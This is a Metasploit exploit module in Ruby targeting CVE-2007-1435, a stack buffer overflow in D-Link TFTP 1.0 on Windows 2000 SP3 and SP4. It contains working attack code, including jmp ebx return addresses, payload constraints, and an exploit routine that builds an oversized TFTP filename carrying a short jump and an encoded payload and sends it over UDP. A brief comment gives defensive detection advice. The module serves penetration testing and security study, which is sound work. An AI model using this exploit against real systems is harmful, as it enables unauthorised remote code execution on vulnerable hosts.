##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-1435, a stack buffer overflow in D-Link TFTP 1.0
# reached over UDP (default port 69) by a request carrying an overly long
# filename. Two Windows 2000 targets (SP3/SP4 English) are defined, each with a
# "jmp ebx" return address. Reliability, stability and side effects are
# recorded as UNKNOWN in the module notes, so treat results as unverified.
#
# Defensive angle: a TFTP read request whose filename field is hundreds of
# bytes long is far outside normal protocol usage and is a simple thing to
# alert on at the network edge; restricting UDP/69 to trusted hosts removes
# the exposure entirely.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Registers the module metadata (name, references, payload constraints,
  # targets, notes) and the one option the module needs, the remote TFTP port.
  #
  # @param info [Hash] module info supplied by the framework
  def initialize(info = {})
    details = {
      'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in D-Link TFTP 1.0.
        By sending a request for an overly long file name, an attacker
        could overflow a buffer and execute arbitrary code. For best results,
        use bind payloads with nonx (No NX).
      },
      'Author' => [
        'LSO <lso[at]hushmail.com>', # Exploit module
        'aushack', # Refs, stability, targets etc
      ],
      'References' => [
        [ 'CVE', '2007-1435' ],
        [ 'OSVDB', '33977' ],
        [ 'BID', '22923' ],
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'process',
      },
      # 1024 bytes of payload space; NUL is the only bad character.
      # '-reverse' excludes reverse-connection payloads, which matches the
      # bind-payload advice in the description above.
      'Payload' => {
        'Space' => 1024,
        'BadChars' => "\x00",
        'Compat' =>
          {
            'ConnectionType' => '-reverse',
          },
      },
      'SaveRegisters' => %w[ecx eax esi],
      'Platform' => 'win',

      'Targets' => [
        # Patrick tested OK 20090228
        ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
        ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
      ],
      'Privileged' => false,
      'DisclosureDate' => '2007-03-12',
      'DefaultTarget' => 0,
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    }

    super(update_info(info, details))

    register_options(
      [
        Opt::RPORT(69)
      ], self
    )
  end

  # Sends a single TFTP request (opcode 0x0001) whose filename field is made
  # of random upper-case filler, a short jump, the selected target's return
  # address and the encoded payload, then starts the payload handler and
  # closes the UDP socket.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # Assemble the datagram in one pass; the byte sequence is identical to
    # building it by successive appends.
    request = [
      "\x00\x01",
      Rex::Text.rand_text_alpha_upper(581),
      Rex::Arch::X86.jmp_short(42),
      Rex::Text.rand_text_alpha_upper(38),
      [target.ret].pack('V'),
      payload.encoded
    ].join

    udp_sock.put(request)

    handler
    disconnect_udp
  end
end